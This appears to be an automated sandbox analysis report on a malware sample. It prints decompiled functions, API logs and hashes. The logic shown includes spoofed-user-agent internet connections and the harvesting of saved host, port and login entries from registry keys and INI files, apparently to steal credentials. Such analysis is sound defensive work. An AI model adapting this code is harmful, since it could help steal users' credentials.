InternetOpenA.WININET(?,?,00000000,00000000,00000000), ref: 004138E9
InternetSetOptionA.WININET(00000000,00000002,0042200C,00000004), ref: 00413908
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00413925
InternetCloseHandle.WININET(00000000), ref: 00413931

Strings

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1), xrefs: 004138DA, 004138E8

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Internet$CloseConnectHandleOpenOption
String ID: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)
API String ID: 910987326-3737944857
Opcode ID: 14dcfe9128598b8fb19586ed9be14e2dc3c8340a80a19de845de97704ccd3449
Instruction ID: c1d041895457b4f7cdba3245a5801219ced23edc4aacfdcef16f368c7f81b0a7
Opcode Fuzzy Hash: 14dcfe9128598b8fb19586ed9be14e2dc3c8340a80a19de845de97704ccd3449
Instruction Fuzzy Hash: 27F02B722102007ADB212B724DCCDAB7EAEEBC9752B04042DF646E1031C5358A44C778

Uniqueness

Uniqueness Score: -1.00%

Function 00413D46, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E00413D46() {
				char _v8;
				struct HINSTANCE__* _v12;
				void* _v1036;
				struct HINSTANCE__* _t13;
				_Unknown_base(*)()* _t15;
				char _t22;
				void* _t28;

				_t22 = 0;
				_t13 = LoadLibraryA("urlmon.dll");
				_v12 = _t13;
				if(_t13 != 0) {
					_t15 = GetProcAddress(_t13, "ObtainUserAgentString");
					if(_t15 != 0) {
						_push( &_v8);
						_push( &_v1036);
						_push(0);
						_v8 = 0x3ff;
						_v1036 = 0;
						if( *_t15() == 0) {
							if(_v8 > 0x3ff) {
								_v8 = 0x3ff;
							}
							 *((char*)(_t28 + _v8 - 0x408)) = _t22;
							_t22 = E0041215C( &_v1036 | 0xffffffff,  &_v1036);
						}
					}
					FreeLibrary(_v12);
				}
				return _t22;
			}

0x00413d55
0x00413d57
0x00413d5d
0x00413d62
0x00413d6a
0x00413d72
0x00413d78
0x00413d7f
0x00413d85
0x00413d86
0x00413d89
0x00413d93
0x00413d98
0x00413d9a
0x00413d9a
0x00413da0
0x00413db6
0x00413db6
0x00413db8
0x00413dbc
0x00413dbc
0x00413dc6

APIs

LoadLibraryA.KERNEL32(urlmon.dll,00000000), ref: 00413D57
GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 00413D6A
FreeLibrary.KERNEL32(?), ref: 00413DBC

Strings

ObtainUserAgentString, xrefs: 00413D64
urlmon.dll, xrefs: 00413D50

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Library$AddressFreeLoadProc
String ID: ObtainUserAgentString$urlmon.dll
API String ID: 145871493-2685262326
Opcode ID: cc36a403a517566e28ca31b57802fcba21f6b3fc346ee256f458a90bb2cd6658
Instruction ID: ac467fea48eed13d1fe7c367e74f4d63d4e1353c159e730edc366066fbadf321
Opcode Fuzzy Hash: cc36a403a517566e28ca31b57802fcba21f6b3fc346ee256f458a90bb2cd6658
Instruction Fuzzy Hash: 40018871900255FBCB509FE89D845DE7BBCAB04301F1005FEB655F3290D5348F888B68

Uniqueness

Uniqueness Score: -1.00%

Function 00409ED4, Relevance: 7.7, APIs: 5, Instructions: 202
registryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00409ED4(char* __ecx, void* __eflags) {
				int _v8;
				void* _v12;
				signed int _v16;
				char* _v20;
				intOrPtr _v24;
				int _v28;
				intOrPtr _v32;
				char _v36;
				void* _v40;
				intOrPtr _v44;
				char* _v48;
				char _v60;
				char _v80;
				char _v100;
				char _v120;
				char _v152;
				char _v216;
				char _v284;
				short _v804;
				void* __edi;
				void* __esi;
				intOrPtr _t70;
				int _t102;
				int _t110;
				int _t114;
				void* _t115;
				signed int _t117;
				void* _t119;
				intOrPtr _t121;
				void* _t124;
				intOrPtr _t127;
				int _t134;
				intOrPtr _t136;
				char* _t138;
				char* _t141;
				signed int _t145;
				void* _t146;
				void* _t147;

				_t129 = __ecx;
				_t70 = E00411CCE(0xc08);
				_t127 = _t70;
				_t134 = 0;
				_v24 = _t127;
				if(_t127 == 0) {
					return _t70;
				} else {
					E00419897(0x83,  &_v216);
					_t141 =  &_v284;
					E00419897(0x84, _t141);
					_v48 =  &_v216;
					_v44 = _t141;
					E00411DB1( &_v36,  &_v36, 0, 8);
					E00419897(0x85,  &_v120);
					E00419897(0x86,  &_v100);
					E00419897(0x87,  &_v60);
					_t145 =  &_v80;
					E00419897(0x88, _t145);
					_t12 = _t127 + 0x3fc; // 0x3fc
					_v20 = _t12;
					_v16 = 0;
					do {
						if(RegOpenKeyExW(0x80000001,  *(_t146 + _v16 * 4 - 0x2c), _t134, 8,  &_v12) != 0) {
							goto L22;
						}
						_v28 = _t134;
						_v8 = 0x104;
						if(RegEnumKeyExW(_v12, _t134,  &_v804,  &_v8, _t134, _t134, _t134, _t134) != 0) {
							L21:
							RegCloseKey(_v12);
							goto L22;
						} else {
							goto L4;
						}
						do {
							L4:
							_t136 = _v24;
							_v28 = _v28 + 1;
							_t102 = E00415E26(_v12, _t129, _t136,  &_v804,  &_v120, 0xff);
							_t145 = _t145 | 0xffffffff;
							_v8 = _t102;
							if(_t102 != _t145 && _t102 != 0) {
								_t137 = _t136 + 0x1fe;
								_t110 = E00415E26(_v12, _t129, _t136 + 0x1fe,  &_v804,  &_v100, 0xff);
								_v8 = _t110;
								if(_t110 == _t145 || _t110 == 0) {
									_t114 = E00415E26(_v12, _t129, _t137,  &_v804,  &_v60, 0xff);
									_v8 = _t114;
									if(_t114 == _t145 || _t114 == 0) {
										goto L19;
									} else {
										goto L10;
									}
								} else {
									L10:
									_t115 = _v12;
									_t129 =  &_v804;
									_v40 = _t115;
									if(RegOpenKeyExW(_t115,  &_v804, 0, 1,  &_v40) != 0) {
										_t117 = _t145;
									} else {
										_t145 =  &_v40;
										_t117 = E00415F4E(_t145,  &_v80, _t116, _v20, 0xff);
									}
									_v8 = _t117;
									if(_t117 != 0xffffffff && _t117 != 0) {
										_t138 = _v20;
										if(E00409E7A(_t138) > 0) {
											_t145 =  &_v152;
											_t119 = 0x56;
											E00419897(_t119, _t145);
											_t121 = _v24;
											_push(_t121);
											_t129 = _t138;
											_push(_t138);
											_push(_t121 + 0x1fe);
											_t124 = E004129F1(_t145, 0x307, _t138 + 0x1fe, _t145);
											_t147 = _t147 + 0x10;
											if(_t124 > 0) {
												_t129 =  &_v36;
												if(E004120F2(_t124,  &_v36, _v20 + 0x1fe) != 0) {
													_v32 = _v32 + 1;
												}
											}
										}
									}
									goto L19;
								}
							}
							L19:
							_v8 = 0x104;
						} while (RegEnumKeyExW(_v12, _v28,  &_v804,  &_v8, 0, 0, 0, 0) == 0);
						_t134 = 0;
						goto L21;
						L22:
						_v16 = _v16 + 1;
					} while (_v16 < 2);
					E00411CFE(_v24);
					if(_v32 <= _t134) {
						return E00411CFE(_v36);
					}
					return E00407DEB(0x307, _v36, 0xcb);
				}
			}

0x00409ed4
0x00409ee5
0x00409eea
0x00409eec
0x00409eee
0x00409ef3
0x0040a14c
0x00409ef9
0x00409f04
0x00409f09
0x00409f14
0x00409f1f
0x00409f26
0x00409f2e
0x00409f3b
0x00409f48
0x00409f55
0x00409f5a
0x00409f62
0x00409f67
0x00409f6d
0x00409f70
0x00409f78
0x00409f93
0x00000000
0x00000000
0x00409fac
0x00409faf
0x00409fbe
0x0040a109
0x0040a10c
0x00000000
0x00000000
0x00000000
0x00000000
0x00409fc4
0x00409fc4
0x00409fc4
0x00409fc7
0x00409fd9
0x00409fde
0x00409fe1
0x00409fe6
0x0040a003
0x0040a009
0x0040a00e
0x0040a013
0x0040a028
0x0040a02d
0x0040a032
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a040
0x0040a040
0x0040a040
0x0040a04b
0x0040a053
0x0040a05e
0x0040a073
0x0040a060
0x0040a064
0x0040a06c
0x0040a06c
0x0040a075
0x0040a07b
0x0040a081
0x0040a08b
0x0040a08f
0x0040a095
0x0040a096
0x0040a09b
0x0040a09e
0x0040a09f
0x0040a0a1
0x0040a0a7
0x0040a0b6
0x0040a0bb
0x0040a0c0
0x0040a0cc
0x0040a0d6
0x0040a0d8
0x0040a0d8
0x0040a0d6
0x0040a0c0
0x0040a08b
0x00000000
0x0040a07b
0x0040a013
0x0040a0db
0x0040a0ef
0x0040a0ff
0x0040a107
0x00000000
0x0040a112
0x0040a112
0x0040a115
0x0040a122
0x0040a12a
0x00000000
0x0040a143
0x00000000
0x0040a139

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,00000008,?,?,00000000,00000008), ref: 00409F8B
RegEnumKeyExW.ADVAPI32 ref: 00409FB6
RegCloseKey.ADVAPI32(?), ref: 0040A10C

Part of subcall function 00415E26: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0041D7E1,?,?,00000104,.exe,00000000), ref: 00415E3B

RegEnumKeyExW.ADVAPI32 ref: 0040A0F9

Part of subcall function 00415E26: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,0041D7E1,?,?,00000104), ref: 00415EBC

RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?,?,?,000000FF,?,?,000000FF,?,?,000000FF), ref: 0040A056

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Open$Enum$CloseEnvironmentExpandStrings
String ID:
API String ID: 2343474859-0
Opcode ID: 55004a917821085185fe75163768d8af24995224d62f918f5300c050b4be4501
Instruction ID: 30653615593a80cb46f7207795676ef88a7bc515065a6cd04a5c4c8ff704ad56
Opcode Fuzzy Hash: 55004a917821085185fe75163768d8af24995224d62f918f5300c050b4be4501
Instruction Fuzzy Hash: B7711B72D00219ABDB11EFA5CD45AEFBBBCEB48304F10416AF605F3291D6389E858B65

Uniqueness

Uniqueness Score: -1.00%

Function 00408F9A, Relevance: 7.7, APIs: 5, Instructions: 158
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00408F9A(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
				short _v524;
				char _v564;
				short _v576;
				short _v588;
				short _v600;
				short _v608;
				WCHAR* _v612;
				WCHAR* _v616;
				WCHAR* _v620;
				WCHAR* _v624;
				WCHAR* _v628;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t51;
				WCHAR* _t54;
				WCHAR* _t56;
				void* _t57;
				void* _t59;
				void* _t61;
				void* _t63;
				long _t67;
				WCHAR* _t69;
				long _t77;
				long _t80;
				WCHAR* _t82;
				void* _t83;
				WCHAR* _t86;
				WCHAR* _t87;
				short* _t92;
				WCHAR* _t93;
				int _t102;
				WCHAR* _t107;
				intOrPtr _t114;
				signed int _t115;
				void* _t117;

				_t117 = (_t115 & 0xfffffff8) - 0x26c;
				if(E00417593( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
					L19:
					return 1;
				}
				_t120 =  *__edx & 0x00000010;
				if(( *__edx & 0x00000010) == 0) {
					_t107 = E00411CCE(0x1fffe);
					_v612 = _t107;
					__eflags = _t107;
					if(_t107 == 0) {
						goto L19;
					}
					_t51 = GetPrivateProfileStringW(0, 0, 0, _t107, 0xffff,  &_v524);
					__eflags = _t51;
					if(_t51 == 0) {
						L18:
						E00411CFE(_t107);
						goto L19;
					}
					_t9 =  &(_t51[0]); // 0x1
					_t54 = E00412BAE(_t107, _t9);
					__eflags = _t54;
					if(_t54 == 0) {
						goto L18;
					}
					_t56 = E00411CCE(0xc1c);
					_v620 = _t56;
					__eflags = _t56;
					if(_t56 != 0) {
						_t11 =  &(_t56[0xff]); // 0x1fe
						_t92 = _t11;
						_v624 = _t107;
						_v616 = _t92;
						_t57 = 0x5c;
						_t93 =  &(_t92[0xff]);
						__eflags = _t93;
						E00419897(_t57,  &_v608);
						_t59 = 0x5d;
						E00419897(_t59,  &_v588);
						_t61 = 0x5e;
						E00419897(_t61,  &_v576);
						_t63 = 0x5f;
						E00419897(_t63,  &_v600);
						do {
							_t67 = GetPrivateProfileStringW(_v624,  &_v608, 0, _v620, 0xff,  &_v524);
							__eflags = _t67;
							if(_t67 != 0) {
								_t102 = GetPrivateProfileIntW(_v624,  &_v588, 0x15,  &_v524);
								_t25 = _t102 - 1; // -1
								__eflags = _t25 - 0xfffe;
								if(_t25 <= 0xfffe) {
									_t77 = GetPrivateProfileStringW(_v624,  &_v576, 0, _v616, 0xff,  &_v524);
									__eflags = _t77;
									if(_t77 != 0) {
										_t80 = GetPrivateProfileStringW(_v624,  &_v600, 0, _t93, 0xff,  &_v524);
										__eflags = _t80;
										if(_t80 != 0) {
											_t82 = E00408E8D(_v624, _t93);
											__eflags = _t82;
											if(_t82 > 0) {
												_t113 =  &_v564;
												_t83 = 0x55;
												E00419897(_t83,  &_v564);
												_push(_t102);
												_push(_v620);
												_push(_t93);
												_push(_v616);
												_t37 =  &(_t93[0xff]); // 0x1fe
												_t103 = _t37;
												_t86 = E004129F1(_t113, 0x311, _t37, _t113);
												_t117 = _t117 + 0x14;
												__eflags = _t86;
												if(_t86 > 0) {
													_t114 = _a4;
													_t87 = E004120F2(_t86, _t114, _t103);
													__eflags = _t87;
													if(_t87 != 0) {
														_t39 = _t114 + 4;
														 *_t39 =  &(( *(_t114 + 4))[0]);
														__eflags =  *_t39;
													}
												}
											}
										}
									}
								}
							}
							_t69 = E00412BEA(_v624, 1);
							_v628 = _t69;
							__eflags = _t69;
						} while (_t69 != 0);
						E00411CFE(_v620);
						_t107 = _v616;
					}
					goto L18;
				} else {
					E00408F40(_t120,  &_v524, _a4);
					goto L19;
				}
			}

0x00408fa0
0x00408fbb
0x0040917d
0x00409185
0x00409185
0x00408fc1
0x00408fc4
0x00408fe2
0x00408fe4
0x00408fe8
0x00408fea
0x00000000
0x00000000
0x00409001
0x00409007
0x00409009
0x00409177
0x00409178
0x00000000
0x00409178
0x0040900f
0x00409014
0x00409019
0x0040901b
0x00000000
0x00000000
0x00409026
0x0040902b
0x0040902f
0x00409031
0x00409037
0x00409037
0x0040903f
0x00409043
0x0040904b
0x0040904c
0x0040904c
0x00409052
0x0040905d
0x0040905e
0x00409069
0x0040906a
0x00409075
0x00409076
0x0040907b
0x00409095
0x0040909b
0x0040909d
0x004090b9
0x004090bb
0x004090be
0x004090c3
0x004090de
0x004090e4
0x004090e6
0x004090fa
0x00409100
0x00409102
0x00409108
0x0040910d
0x0040910f
0x00409113
0x00409117
0x00409118
0x0040911d
0x0040911e
0x00409124
0x00409125
0x0040912f
0x0040912f
0x00409135
0x0040913a
0x0040913d
0x0040913f
0x00409141
0x00409147
0x0040914c
0x0040914e
0x00409150
0x00409150
0x00409150
0x00409150
0x0040914e
0x0040913f
0x0040910f
0x00409102
0x004090e6
0x004090c3
0x00409159
0x0040915e
0x00409162
0x00409162
0x0040916e
0x00409173
0x00409173
0x00000000
0x00408fc6
0x00408fce
0x00000000
0x00408fce

APIs

Part of subcall function 00417593: PathCombineW.SHLWAPI(0041C47F,0041C47F,?,0041C47F,?,?), ref: 004175B2

GetPrivateProfileStringW.KERNEL32 ref: 00409001
GetPrivateProfileStringW.KERNEL32 ref: 00409095
GetPrivateProfileIntW.KERNEL32 ref: 004090B3
GetPrivateProfileStringW.KERNEL32 ref: 004090DE
GetPrivateProfileStringW.KERNEL32 ref: 004090FA

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: PrivateProfile$String$CombinePath
String ID:
API String ID: 2134968610-0
Opcode ID: 3e4dee2ce2c0371b9ac0d8c812f4a6baa844325e6f8f4a5c18e60ea37298c377
Instruction ID: c54434842e28901c345af476fdb3157fd51edee89c34d8a0717ab5b7b0674521
Opcode Fuzzy Hash: 3e4dee2ce2c0371b9ac0d8c812f4a6baa844325e6f8f4a5c18e60ea37298c377
Instruction Fuzzy Hash: 0F518431604306ABD710AF11CC05FAB7BE8AF44754F04093EF994E72A2D739DD458B96

Uniqueness

Uniqueness Score: -1.00%

Function 00417B77, Relevance: 7.6, APIs: 5, Instructions: 111
fileCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00417B77(void* __ecx, signed int __edx, void** __esi, long _a4) {
				char _v5;
				void _v16;
				struct _OVERLAPPED* _v24;
				struct _OVERLAPPED* _v28;
				signed int _v32;
				signed int _v36;
				void* _t29;
				signed int _t31;
				int _t38;
				int _t39;
				signed int _t41;
				int _t42;
				int _t45;
				intOrPtr _t48;
				void* _t49;
				signed int _t53;
				struct _OVERLAPPED* _t54;
				void** _t56;

				_t56 = __esi;
				_t53 = __edx;
				_t49 = __ecx;
				_t54 = 0;
				_v5 = 0;
				_t29 = CreateFileW(_a4, 0xc0000000, 1, 0, 4, 0x80, 0);
				 *__esi = _t29;
				if(_t29 != 0xffffffff) {
					_t31 = E0041703D(_t49, _t29);
					_v36 = _t31;
					_v32 = _t53;
					if((_t31 & _t53) == 0xffffffff) {
						L4:
						CloseHandle( *_t56);
						 *_t56 =  *_t56 | 0xffffffff;
					} else {
						if((_t31 | _t53) == 0) {
							L18:
							_t56[2] = _t56[2] | 0xffffffff;
							_t25 =  &(_t56[3]);
							 *_t25 = _t56[3] | 0xffffffff;
							__eflags =  *_t25;
							_v5 = 1;
							E00416FED( *_t56, _t54, _t54, _t54);
						} else {
							_v28 = 0;
							_v24 = 0;
							if(ReadFile( *__esi,  &_v16, 5,  &_a4, 0) != 0) {
								while(1) {
									__eflags = _a4 - _t54;
									if(_a4 == _t54) {
										goto L18;
									}
									__eflags = _a4 - 5;
									if(_a4 != 5) {
										L16:
										_t38 = E00416FED( *_t56, _v28, _v24, _t54);
										__eflags = _t38;
										if(_t38 == 0) {
											goto L4;
										} else {
											_t39 = SetEndOfFile( *_t56);
											__eflags = _t39;
											if(_t39 == 0) {
												goto L4;
											} else {
												goto L18;
											}
										}
									} else {
										_t41 = _v16 ^ _t56[4];
										asm("adc edi, [ebp-0x14]");
										_t48 = _t41 + _v28 + 5;
										asm("adc edi, ecx");
										_v16 = _t41;
										__eflags = 0 - _v32;
										if(__eflags > 0) {
											L15:
											_t54 = 0;
											__eflags = 0;
											goto L16;
										} else {
											if(__eflags < 0) {
												L11:
												__eflags = _t41 - 0xa00000;
												if(_t41 > 0xa00000) {
													goto L15;
												} else {
													_t42 = E00416FED( *_t56, _t41, 0, 1);
													__eflags = _t42;
													if(_t42 == 0) {
														goto L4;
													} else {
														_v28 = _t48;
														_v24 = 0;
														_t45 = ReadFile( *_t56,  &_v16, 5,  &_a4, 0);
														__eflags = _t45;
														if(_t45 != 0) {
															_t54 = 0;
															__eflags = 0;
															continue;
														} else {
															goto L4;
														}
													}
												}
											} else {
												__eflags = _t48 - _v36;
												if(_t48 > _v36) {
													goto L15;
												} else {
													goto L11;
												}
											}
										}
									}
									goto L19;
								}
								goto L18;
							} else {
								goto L4;
							}
						}
					}
				}
				L19:
				return _v5;
			}

0x00417b77
0x00417b77
0x00417b77
0x00417b7f
0x00417b94
0x00417b98
0x00417b9e
0x00417ba3
0x00417baa
0x00417bb3
0x00417bb6
0x00417bbc
0x00417be3
0x00417be5
0x00417beb
0x00417bbe
0x00417bc0
0x00417c88
0x00417c88
0x00417c8c
0x00417c8c
0x00417c8c
0x00417c95
0x00417c99
0x00417bc6
0x00417bd3
0x00417bd6
0x00417be1
0x00417bf5
0x00417bf5
0x00417bf8
0x00000000
0x00000000
0x00417bfe
0x00417c02
0x00417c62
0x00417c6b
0x00417c70
0x00417c72
0x00000000
0x00417c78
0x00417c7a
0x00417c80
0x00417c82
0x00000000
0x00000000
0x00000000
0x00000000
0x00417c82
0x00417c04
0x00417c07
0x00417c13
0x00417c16
0x00417c19
0x00417c1b
0x00417c1e
0x00417c21
0x00417c60
0x00417c60
0x00417c60
0x00000000
0x00417c23
0x00417c23
0x00417c2a
0x00417c2a
0x00417c2f
0x00000000
0x00417c31
0x00417c37
0x00417c3c
0x00417c3e
0x00000000
0x00417c40
0x00417c4e
0x00417c51
0x00417c54
0x00417c5a
0x00417c5c
0x00417bf3
0x00417bf3
0x00000000
0x00417c5e
0x00000000
0x00417c5e
0x00417c5c
0x00417c3e
0x00417c25
0x00417c25
0x00417c28
0x00000000
0x00000000
0x00000000
0x00000000
0x00417c28
0x00417c23
0x00417c21
0x00000000
0x00417c02
0x00000000
0x00000000
0x00000000
0x00000000
0x00417be1
0x00417bc0
0x00417bbc
0x00417c9e
0x00417ca4

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000004,00000080,00000000,00000000,00000000), ref: 00417B98

Part of subcall function 0041703D: GetFileSizeEx.KERNEL32(00417BAF,00417BAF,?,?,?,00417BAF,00000000), ref: 00417049

ReadFile.KERNEL32(?,?,00000005,00000000,00000000,00000000), ref: 00417BD9
CloseHandle.KERNEL32(?,00000000), ref: 00417BE5
ReadFile.KERNEL32(?,?,00000005,00000005,00000000,?,?,00000000,00000001), ref: 00417C54
SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 00417C7A

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: File$Read$CloseCreateHandleSize
String ID:
API String ID: 1850650832-0
Opcode ID: 56d487b28f9a82195becc95ff2d536cca56d263062c8f76142b3bddbba8a7f3b
Instruction ID: 8c0d9bd763e43f9858a0e5c2c93b941468b5dffffb6103a1eaae74492d96e575
Opcode Fuzzy Hash: 56d487b28f9a82195becc95ff2d536cca56d263062c8f76142b3bddbba8a7f3b
Instruction Fuzzy Hash: 0F41B230908209AEDB208F65CC85FEFBFF5EF48714F10411AF591A62A0D7399581CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040E544, Relevance: 7.6, APIs: 5, Instructions: 94
networkCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040E544(intOrPtr* __edi, void* __eflags, intOrPtr _a4, void* _a8, intOrPtr* _a12) {
				intOrPtr _v28;
				signed int _v44;
				char _v52;
				intOrPtr _v56;
				char _v61;
				intOrPtr _v64;
				signed int _v72;
				intOrPtr _v76;
				char _v77;
				intOrPtr _v84;
				intOrPtr _v85;
				char _v89;
				void* __esi;
				char _t31;
				intOrPtr _t32;
				char* _t37;
				intOrPtr _t44;
				intOrPtr* _t58;
				intOrPtr _t62;
				intOrPtr* _t63;
				intOrPtr _t65;

				_t63 = __edi;
				ResetEvent(_a8);
				_t31 = E00411CCE(0x1000);
				_t65 = 0;
				_v52 = _t31;
				if(_t31 != 0) {
					_t58 = __imp__InternetSetStatusCallbackW;
					_t32 =  *_t58(_a4, E0040E4FB);
					_t62 = 0x28;
					_v56 = _t32;
					 *_a12 = 0;
					 *__edi = 0;
					_v61 = 1;
					E00411DB1( &_v52,  &_v52, 0, _t62);
					_v64 = _t62;
					_v44 = _v72;
					while(1) {
						L3:
						_t37 =  &_v52;
						_v28 = 0x1000;
						__imp__InternetReadFileExA(_a4, _t37, 8, _t65);
						if(_t37 == 0) {
							break;
						}
						if(_v44 != _t65) {
							_t67 = _a12;
							if(E00411C89( *_t63 + _v44, _a12) == 0) {
								L9:
								_v77 = 0;
							} else {
								E00411D3A( *_t67 +  *_t63, _v76, _v44);
								 *_t63 =  *_t63 + _v56;
								_t65 = 0;
								continue;
							}
						}
						L10:
						asm("sbb eax, eax");
						 *_t58(_a4,  ~(_v72 + 1) & _v72);
						E00411CFE(_v84);
						if(_v89 == 0) {
							E00411CFE( *_a12);
						}
						_t44 = _v85;
						goto L13;
					}
					if(GetLastError() != 0x3e5) {
						goto L9;
					} else {
						E0041546B( &_a8);
						goto L3;
					}
					goto L10;
				} else {
					E00411CFE(0);
					_t44 = 0;
				}
				L13:
				return _t44;
			}

0x0040e544
0x0040e552
0x0040e55d
0x0040e562
0x0040e564
0x0040e56a
0x0040e579
0x0040e587
0x0040e58b
0x0040e58c
0x0040e594
0x0040e59c
0x0040e59e
0x0040e5a3
0x0040e5ac
0x0040e5b0
0x0040e5b4
0x0040e5b4
0x0040e5b7
0x0040e5bf
0x0040e5c7
0x0040e5cf
0x00000000
0x00000000
0x0040e5ed
0x0040e5f5
0x0040e5ff
0x0040e61f
0x0040e61f
0x0040e601
0x0040e610
0x0040e619
0x0040e61b
0x00000000
0x0040e61b
0x0040e5ff
0x0040e624
0x0040e62b
0x0040e635
0x0040e63b
0x0040e645
0x0040e64c
0x0040e64c
0x0040e651
0x00000000
0x0040e651
0x0040e5dc
0x00000000
0x0040e5de
0x0040e5e2
0x00000000
0x0040e5e2
0x00000000
0x0040e56c
0x0040e56d
0x0040e572
0x0040e572
0x0040e655
0x0040e65a

APIs

ResetEvent.KERNEL32(?), ref: 0040E552
InternetSetStatusCallbackW.WININET(?,0040E4FB), ref: 0040E587
InternetReadFileExA.WININET ref: 0040E5C7
GetLastError.KERNEL32 ref: 0040E5D1
InternetSetStatusCallbackW.WININET(?,?), ref: 0040E635

Part of subcall function 00411CFE: HeapFree.KERNEL32(00000000,00000000,004134F5,00000000,?,?,?,0041C342,00000000,0041C81E), ref: 00411D11

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Internet$CallbackStatus$ErrorEventFileFreeHeapLastReadReset
String ID:
API String ID: 4044253124-0
Opcode ID: 033e0bb26777d2f9070fe7bd6c1ede46ae4a546870698f1664d18c4097a1fb22
Instruction ID: 5ee9b623b86201fea9687af39c3a8196f1efda26349449274a2910d6d85fe58f
Opcode Fuzzy Hash: 033e0bb26777d2f9070fe7bd6c1ede46ae4a546870698f1664d18c4097a1fb22
Instruction Fuzzy Hash: 8231AF71104341AFCB11DF65DC40A9ABBE8FF95708F004C2AF984972A1E739D964CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040F181, Relevance: 7.6, APIs: 5, Instructions: 85
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F181(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
				void* _v8;
				long _v12;
				void* _v16;
				char _v32;
				void _v360;
				short _v880;
				void* __edi;
				void* __esi;
				void* _t18;
				void* _t25;
				void* _t26;
				long _t39;
				void* _t42;
				void* _t44;
				long _t47;

				_t48 =  &_v32;
				_t18 = 0x2b;
				_v16 = __edx;
				_t44 = __ecx;
				E00419897(_t18,  &_v32);
				if(E00417593(_t48,  &_v880, _t44) == 0) {
					L11:
					return 1;
				}
				_t25 = CreateFileW( &_v880, 0x40000000, 1, 0, 2, 0x80, 0);
				_v8 = _t25;
				if(_t25 == 0xffffffff) {
					goto L11;
				}
				_t26 = 0x30;
				_t39 = 0;
				E00419861(_t26,  &_v360);
				if(WriteFile(_v8,  &_v360, 0x146,  &_v12, 0) == 0 || _v12 != 0x146) {
					L9:
					FlushFileBuffers(_v8);
					CloseHandle(_v8);
					if(_t39 == 0) {
						E00417064( &_v880);
					}
					goto L11;
				} else {
					_t42 = _v16;
					if(_t42 == 0) {
						L7:
						_t39 = 1;
						goto L9;
					}
					_t47 = E0041283B(_t42);
					if(WriteFile(_v8, _t42, _t47,  &_v12, 0) == 0 || _v12 != _t47) {
						_t39 = 0;
						goto L9;
					} else {
						goto L7;
					}
				}
			}

0x0040f18e
0x0040f191
0x0040f192
0x0040f195
0x0040f197
0x0040f1ad
0x0040f263
0x0040f267
0x0040f267
0x0040f1cc
0x0040f1d2
0x0040f1d8
0x00000000
0x00000000
0x0040f1e7
0x0040f1e8
0x0040f1ea
0x0040f20e
0x0040f23f
0x0040f242
0x0040f24b
0x0040f254
0x0040f25d
0x0040f25d
0x00000000
0x0040f215
0x0040f215
0x0040f21a
0x0040f239
0x0040f239
0x00000000
0x0040f239
0x0040f223
0x0040f232
0x0040f23d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040f232

APIs

Part of subcall function 00417593: PathCombineW.SHLWAPI(0041C47F,0041C47F,?,0041C47F,?,?), ref: 004175B2

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?,?,00000000), ref: 0040F1CC
WriteFile.KERNEL32(0040F169,?,00000146,?,00000000,00000000), ref: 0040F20A
WriteFile.KERNEL32(0040F169,?,00000000,?,00000000), ref: 0040F22E
FlushFileBuffers.KERNEL32(0040F169), ref: 0040F242
CloseHandle.KERNEL32(0040F169), ref: 0040F24B

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: File$Write$BuffersCloseCombineCreateFlushHandlePath
String ID:
API String ID: 2459967240-0
Opcode ID: da73463de5de5db7338b432361a2fdc757fa0bc37107aae9d1ba310e5e1c1d65
Instruction ID: a2198eed0751b6034820acdcabda30e86b8b24b278b1a98d599fbe484e92e051
Opcode Fuzzy Hash: da73463de5de5db7338b432361a2fdc757fa0bc37107aae9d1ba310e5e1c1d65
